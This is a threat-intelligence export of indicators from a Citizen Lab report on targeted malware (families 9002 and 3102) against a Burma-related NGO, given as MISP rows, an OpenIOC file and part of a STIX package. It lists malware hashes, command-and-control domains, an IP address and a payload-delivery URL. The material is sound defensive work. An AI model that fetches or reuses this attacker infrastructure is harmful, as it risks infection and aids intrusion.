21 581bad90-56b0-4c8b-ba6b-497a8e96ca05 4 Internal reference link https://citizenlab.org/2015/10/targeted-attacks-ngo-burma/ 0 20151016
22 5824e57b-8458-4669-b6a0-497a8e96ca05 4 Attribution whois-registrant-email wojiaojilao2@sohu.com 0 20151016
23 5824e58f-be40-407d-b91b-497a8e96ca05 4 Network activity domain iyouthen.com Identified through passive DNS 1 20151016
24 5824e5f1-d174-487e-9156-497a8e96ca05 4 Payload delivery url http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe 1 20151016

View File

@@ -0,0 +1,77 @@
<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="581bac8e-b478-474a-a013-49798e96ca05" last-modified="2015-10-16T00:00:00" xmlns="http://schemas.mandiant.com/2010/ioc">
<short_description>Event #4</short_description>
<description>Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites</description>
<keywords />
<authored_by>citizenlab</authored_by>
<authored_date>2015-10-16T00:00:00</authored_date>
<links />
<definition>
<Indicator operator="OR" id="581bac8e-b478-474a-a013-49798e96ca05">
<IndicatorItem id="c4c147bdfddffec2eea6bf99661e69ee" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="884d46c01c762ad6ddd2759fd921bf71" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="56f0e67d981024ddcc215543698f44fb" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="7e0081fba718fcd71753d3199a290f03" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="5710d567d98a8f4a6682859ce3a35336" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="cec071424d417a095221bf8992819388" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="49ceba3347d39870f15f2ab0391af234" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="usafbi.websecexp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="usacia.websecexp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="webhttps.websecexp.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="iyouthen.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="appeur.gnway.cc" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="t1.mailsecurityservice.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="t2.mailsecurityservice.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="198.44.190.85" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe" condition="is">
<Context document="UrlHistoryItem" search="UrlHistoryItem/URL" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
</Indicator>
</definition>
</ioc>

View File

@@ -0,0 +1,736 @@
<stix:STIX_Package
xmlns:cyboxCommon="http://cybox.mitre.org/common-2"
xmlns:cybox="http://cybox.mitre.org/cybox-2"
xmlns:cyboxVocabs="http://cybox.mitre.org/default_vocabularies-2"
xmlns:ASObj="http://cybox.mitre.org/objects#ASObject-1"
xmlns:AddressObj="http://cybox.mitre.org/objects#AddressObject-2"
xmlns:DomainNameObj="http://cybox.mitre.org/objects#DomainNameObject-1"
xmlns:EmailMessageObj="http://cybox.mitre.org/objects#EmailMessageObject-2"
xmlns:FileObj="http://cybox.mitre.org/objects#FileObject-2"
xmlns:HTTPSessionObj="http://cybox.mitre.org/objects#HTTPSessionObject-2"
xmlns:HostnameObj="http://cybox.mitre.org/objects#HostnameObject-1"
xmlns:MutexObj="http://cybox.mitre.org/objects#MutexObject-2"
xmlns:PipeObj="http://cybox.mitre.org/objects#PipeObject-2"
xmlns:URIObj="http://cybox.mitre.org/objects#URIObject-2"
xmlns:WinRegistryKeyObj="http://cybox.mitre.org/objects#WinRegistryKeyObject-2"
xmlns:marking="http://data-marking.mitre.org/Marking-1"
xmlns:tlpMarking="http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1"
xmlns:et="http://stix.mitre.org/ExploitTarget-1"
xmlns:incident="http://stix.mitre.org/Incident-1"
xmlns:indicator="http://stix.mitre.org/Indicator-2"
xmlns:ttp="http://stix.mitre.org/TTP-1"
xmlns:ta="http://stix.mitre.org/ThreatActor-1"
xmlns:stixCommon="http://stix.mitre.org/common-1"
xmlns:stixVocabs="http://stix.mitre.org/default_vocabularies-1"
xmlns:stix-ciqidentity="http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1"
xmlns:snortTM="http://stix.mitre.org/extensions/TestMechanism#Snort-1"
xmlns:stix="http://stix.mitre.org/stix-1"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:="https://rufus.citlab.utoronto.ca"
xmlns:xal="urn:oasis:names:tc:ciq:xal:3"
xmlns:xnl="urn:oasis:names:tc:ciq:xnl:3"
xmlns:xpil="urn:oasis:names:tc:ciq:xpil:3"
xsi:schemaLocation="
http://cybox.mitre.org/common-2 http://cybox.mitre.org/XMLSchema/common/2.1/cybox_common.xsd
http://cybox.mitre.org/cybox-2 http://cybox.mitre.org/XMLSchema/core/2.1/cybox_core.xsd
http://cybox.mitre.org/default_vocabularies-2 http://cybox.mitre.org/XMLSchema/default_vocabularies/2.1/cybox_default_vocabularies.xsd
http://cybox.mitre.org/objects#ASObject-1 http://cybox.mitre.org/XMLSchema/objects/AS/1.0/AS_Object.xsd
http://cybox.mitre.org/objects#AddressObject-2 http://cybox.mitre.org/XMLSchema/objects/Address/2.1/Address_Object.xsd
http://cybox.mitre.org/objects#DomainNameObject-1 http://cybox.mitre.org/XMLSchema/objects/Domain_Name/1.0/Domain_Name_Object.xsd
http://cybox.mitre.org/objects#EmailMessageObject-2 http://cybox.mitre.org/XMLSchema/objects/Email_Message/2.1/Email_Message_Object.xsd
http://cybox.mitre.org/objects#FileObject-2 http://cybox.mitre.org/XMLSchema/objects/File/2.1/File_Object.xsd
http://cybox.mitre.org/objects#HTTPSessionObject-2 http://cybox.mitre.org/XMLSchema/objects/HTTP_Session/2.1/HTTP_Session_Object.xsd
http://cybox.mitre.org/objects#HostnameObject-1 http://cybox.mitre.org/XMLSchema/objects/Hostname/1.0/Hostname_Object.xsd
http://cybox.mitre.org/objects#MutexObject-2 http://cybox.mitre.org/XMLSchema/objects/Mutex/2.1/Mutex_Object.xsd
http://cybox.mitre.org/objects#PipeObject-2 http://cybox.mitre.org/XMLSchema/objects/Pipe/2.1/Pipe_Object.xsd
http://cybox.mitre.org/objects#URIObject-2 http://cybox.mitre.org/XMLSchema/objects/URI/2.1/URI_Object.xsd
http://cybox.mitre.org/objects#WinRegistryKeyObject-2 http://cybox.mitre.org/XMLSchema/objects/Win_Registry_Key/2.1/Win_Registry_Key_Object.xsd
http://data-marking.mitre.org/Marking-1 http://stix.mitre.org/XMLSchema/data_marking/1.1.1/data_marking.xsd
http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1 http://stix.mitre.org/XMLSchema/extensions/marking/tlp/1.1.1/tlp_marking.xsd
http://stix.mitre.org/ExploitTarget-1 http://stix.mitre.org/XMLSchema/exploit_target/1.1.1/exploit_target.xsd
http://stix.mitre.org/Incident-1 http://stix.mitre.org/XMLSchema/incident/1.1.1/incident.xsd
http://stix.mitre.org/Indicator-2 http://stix.mitre.org/XMLSchema/indicator/2.1.1/indicator.xsd
http://stix.mitre.org/TTP-1 http://stix.mitre.org/XMLSchema/ttp/1.1.1/ttp.xsd
http://stix.mitre.org/ThreatActor-1 http://stix.mitre.org/XMLSchema/threat_actor/1.1.1/threat_actor.xsd
http://stix.mitre.org/common-1 http://stix.mitre.org/XMLSchema/common/1.1.1/stix_common.xsd
http://stix.mitre.org/default_vocabularies-1 http://stix.mitre.org/XMLSchema/default_vocabularies/1.1.1/stix_default_vocabularies.xsd
http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1 http://stix.mitre.org/XMLSchema/extensions/identity/ciq_3.0/1.1.1/ciq_3.0_identity.xsd
http://stix.mitre.org/extensions/TestMechanism#Snort-1 http://stix.mitre.org/XMLSchema/extensions/test_mechanism/snort/1.1.1/snort_test_mechanism.xsd
http://stix.mitre.org/stix-1 http://stix.mitre.org/XMLSchema/core/1.1.1/stix_core.xsd
urn:oasis:names:tc:ciq:xal:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xAL.xsd
urn:oasis:names:tc:ciq:xnl:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xNL.xsd
urn:oasis:names:tc:ciq:xpil:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xPIL.xsd" id=":Package-a3126f94-8e7e-48d3-ad30-dcc198ba7c78" version="1.1.1" timestamp="2016-11-10T21:28:56.977467+00:00">
<stix:STIX_Header>
<stix:Title>Export from MISP</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:Related_Packages>
<stix:Related_Package>
<stix:Package id=":STIXPackage-581bac8e-b478-474a-a013-49798e96ca05" version="1.1.1" timestamp="2016-11-10T16:26:09+00:00">
<stix:STIX_Header>
<stix:Title>Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites (MISP Event #4)</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:TTPs>
<stix:TTP id=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'>
<ttp:Title>Payload type: 9002 (MISP Attribute #87)</ttp:Title>
<ttp:Behavior>
<ttp:Malware>
<ttp:Malware_Instance>
<ttp:Name>9002</ttp:Name>
</ttp:Malware_Instance>
</ttp:Malware>
</ttp:Behavior>
</stix:TTP>
<stix:TTP id=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'>
<ttp:Title>Payload type: 3102 (MISP Attribute #88)</ttp:Title>
<ttp:Description>The variant is labeled 3102, because it always uses the string “3102” in its first communications with a C2 server</ttp:Description>
<ttp:Behavior>
<ttp:Malware>
<ttp:Malware_Instance>
<ttp:Name>3102</ttp:Name>
</ttp:Malware_Instance>
</ttp:Malware>
</ttp:Behavior>
</stix:TTP>
</stix:TTPs>
<stix:Incidents>
<stix:Incident id=":incident-581bac8e-b478-474a-a013-49798e96ca05" timestamp="2016-11-10T16:26:30+00:00" xsi:type='incident:IncidentType'>
<incident:Title>Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites</incident:Title>
<incident:External_ID source="MISP Event">4</incident:External_ID>
<incident:Time>
<incident:Incident_Discovery precision="second">2015-10-16T00:00:00+00:00</incident:Incident_Discovery>
<incident:Incident_Reported precision="second">2016-11-10T16:26:30+00:00</incident:Incident_Reported>
</incident:Time>
<incident:Status xsi:type="stixVocabs:IncidentStatusVocab-1.0">New</incident:Status>
<incident:Related_Indicators>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-2488-429a-b001-497a8e96ca05" timestamp="2016-11-10T16:22:16+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: c4c147bdfddffec2eea6bf99661e69ee (MISP Attribute #93)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: c4c147bdfddffec2eea6bf99661e69ee (MISP Attribute #93)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-2488-429a-b001-497a8e96ca05">
<cybox:Object id=":File-581bad50-2488-429a-b001-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">c4c147bdfddffec2eea6bf99661e69ee</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:22:16+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-aea8-4d5f-8e0c-497a8e96ca05" timestamp="2016-11-10T16:22:25+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: 884d46c01c762ad6ddd2759fd921bf71 (MISP Attribute #94)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: 884d46c01c762ad6ddd2759fd921bf71 (MISP Attribute #94)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-aea8-4d5f-8e0c-497a8e96ca05">
<cybox:Object id=":File-581bad50-aea8-4d5f-8e0c-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">884d46c01c762ad6ddd2759fd921bf71</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:22:25+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-a014-4095-a054-497a8e96ca05" timestamp="2016-11-10T16:22:33+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: 56f0e67d981024ddcc215543698f44fb (MISP Attribute #95)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: 56f0e67d981024ddcc215543698f44fb (MISP Attribute #95)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-a014-4095-a054-497a8e96ca05">
<cybox:Object id=":File-581bad50-a014-4095-a054-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">56f0e67d981024ddcc215543698f44fb</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:22:33+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-d494-4e55-aa91-497a8e96ca05" timestamp="2016-11-10T16:22:44+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: 7e0081fba718fcd71753d3199a290f03 (MISP Attribute #96)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: 7e0081fba718fcd71753d3199a290f03 (MISP Attribute #96)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-d494-4e55-aa91-497a8e96ca05">
<cybox:Object id=":File-581bad50-d494-4e55-aa91-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">7e0081fba718fcd71753d3199a290f03</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:22:44+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-8998-4012-926d-497a8e96ca05" timestamp="2016-11-10T16:23:13+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: 5710d567d98a8f4a6682859ce3a35336 (MISP Attribute #97)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: 5710d567d98a8f4a6682859ce3a35336 (MISP Attribute #97)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-8998-4012-926d-497a8e96ca05">
<cybox:Object id=":File-581bad50-8998-4012-926d-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">5710d567d98a8f4a6682859ce3a35336</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:23:13+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad50-7890-4dcf-8436-497a8e96ca05" timestamp="2016-11-10T16:23:24+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: cec071424d417a095221bf8992819388 (MISP Attribute #98)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: cec071424d417a095221bf8992819388 (MISP Attribute #98)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad50-7890-4dcf-8436-497a8e96ca05">
<cybox:Object id=":File-581bad50-7890-4dcf-8436-497a8e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">cec071424d417a095221bf8992819388</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:23:24+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Artifacts dropped</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bad60-2a18-44cc-ac40-49798e96ca05" timestamp="2016-11-10T16:23:34+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Artifacts dropped: 49ceba3347d39870f15f2ab0391af234 (MISP Attribute #99)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">File Hash Watchlist</indicator:Type>
<indicator:Description>Artifacts dropped: 49ceba3347d39870f15f2ab0391af234 (MISP Attribute #99)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bad60-2a18-44cc-ac40-49798e96ca05">
<cybox:Object id=":File-581bad60-2a18-44cc-ac40-49798e96ca05">
<cybox:Properties xsi:type="FileObj:FileObjectType">
<FileObj:Hashes>
<cyboxCommon:Hash>
<cyboxCommon:Type condition="Equals" xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
<cyboxCommon:Simple_Hash_Value condition="Equals">49ceba3347d39870f15f2ab0391af234</cyboxCommon:Simple_Hash_Value>
</cyboxCommon:Hash>
</FileObj:Hashes>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:23:34+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Attribution</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-5824e57b-8458-4669-b6a0-497a8e96ca05" timestamp="2016-11-10T16:24:11+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Attribution: wojiaojilao2@sohu.com (MISP Attribute #1876)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Description>Attribution: wojiaojilao2@sohu.com (MISP Attribute #1876)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bace8-59d0-4c6e-859a-497a8e96ca05" timestamp="2016-11-03T17:32:24+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581bacf2-d924-45bd-a930-49798e96ca05" timestamp="2016-11-03T17:32:34+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-10T16:24:11+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">None</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581bacca-eb70-4443-a7d1-49798e96ca05" timestamp="2016-11-03T17:31:54+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: usafbi.websecexp.com (MISP Attribute #83)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: usafbi.websecexp.com (MISP Attribute #83)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581bacca-eb70-4443-a7d1-49798e96ca05">
<cybox:Object id=":DomainName-581bacca-eb70-4443-a7d1-49798e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">usafbi.websecexp.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
